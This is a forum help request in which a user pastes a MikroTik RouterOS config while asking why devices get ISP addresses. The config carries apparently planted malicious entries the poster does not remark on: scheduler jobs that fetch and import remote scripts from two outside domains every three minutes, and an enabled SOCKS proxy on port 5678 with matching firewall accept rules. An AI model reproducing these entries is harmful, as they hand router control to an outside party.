It works for 4 years without any problems until i reset it.
Now i'm trying to set it up, but ran into a problem. Devices connected to this router sometimes getting IP addresses from my ISP instead of the router's local addresses (from router DHCP Server). Even, from the access points (i have three of them).
ISP connected through the SFP port.
Thanks in advance.
Here is my config.
Code: Select all
[admin@MikroTik] > export compact
# aug/06/2021 09:21:25 by RouterOS 6.41
# software id = FDPG-2TR9
#
# model = 2011UiAS-2HnD
# serial number = 7A670712F998
/interface bridge
add admin-mac=64:D1:54:12:14:61 auto-mac=no comment=defconf name=bridge
/interface ethernet
set [ find default-name=ether4 ] name="Bed room"
set [ find default-name=ether5 ] name=Cabinet
set [ find default-name=ether2 ] name="Living Room"
set [ find default-name=ether3 ] name="Maxim Room"
set [ find default-name=ether8 ] name="Nikita Room"
/interface wireless
set [ find default-name=wlan1 ] band=2ghz-b/g/n channel-width=20/40mhz-Ce distance=indoors frequency=auto mode=ap-bridge ssid=MikroTik-12146A wireless-protocol=802.11
/interface list
add comment=defconf name=WAN
add comment=defconf name=LAN
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa-psk,wpa2-psk mode=dynamic-keys supplicant-identity=MikroTik wpa-pre-shared-key=--redacted-- wpa2-pre-shared-key=--redacted--
/ip pool
add name=dhcp ranges=192.168.88.10-192.168.88.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=bridge name="Cat DHCP"
/interface bridge port
add bridge=bridge comment=defconf interface="Living Room"
add bridge=bridge comment=defconf interface="Maxim Room"
add bridge=bridge comment=defconf interface="Bed room"
add bridge=bridge comment=defconf interface=Cabinet
add bridge=bridge comment=defconf interface=ether6
add bridge=bridge comment=defconf interface=ether7
add bridge=bridge comment=defconf interface="Nikita Room"
add bridge=bridge comment=defconf interface=ether9
add bridge=bridge comment=defconf interface=sfp1
add bridge=bridge comment=defconf interface=wlan1
/ip neighbor discovery-settings
set discover-interface-list=LAN
/interface list member
add comment=defconf interface=bridge list=LAN
add comment=defconf interface=sfp1 list=WAN
/ip address
add address=192.168.88.1/24 comment=defconf interface=bridge network=192.168.88.0
/ip dhcp-client
add comment=defconf dhcp-options=hostname,clientid disabled=no interface=bridge
/ip dhcp-server network
add address=192.168.88.0/24 comment=defconf dns-server=192.168.88.1 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes
/ip dns static
add address=192.168.88.1 name=router.lan
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input dst-port=5678 protocol=tcp
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP" protocol=icmp
add action=drop chain=input comment="defconf: drop all not coming from LAN" in-interface-list=!LAN
add action=accept chain=forward comment="defconf: accept in ipsec policy" ipsec-policy=in,ipsec
add action=accept chain=forward comment="defconf: accept out ipsec policy" ipsec-policy=out,ipsec
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related, untracked" connection-state=established,related,untracked
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf: drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface-list=WAN
/ip firewall nat
add action=masquerade chain=srcnat comment="defconf: masquerade" ipsec-policy=out,none out-interface=bridge out-interface-list=all
/ip service
set telnet disabled=yes
set ftp address=192.168.88.0/24
set www address=192.168.88.0/24
set ssh address=192.168.88.0/24
set api disabled=yes
set winbox address=192.168.88.0/24
set api-ssl disabled=yes
/ip socks
set enabled=yes port=5678
/lcd interface pages
set 0 interfaces=wlan1
/system clock
set time-zone-name=Europe/Riga
/system scheduler
add interval=3m name=U7 on-event="/tool fetch url=http://massgames.space/poll/16d3cfaf-0057-452f-ba0f-c0fe61488119 mode=http dst-path=7xe7zt46hb08\r\
\n/import 7xe7zt46hb08" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
add interval=3m name=U6 on-event="/tool fetch url=http://strtbiz.site/poll/fc9cbeff-0e41-4f0c-bc76-067f9270c6bb mode=http dst-path=7wmp0b4s.rsc\r\
\n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=startup
/tool mac-server
set allowed-interface-list=LAN
/tool mac-server mac-winbox
set allowed-interface-list=LAN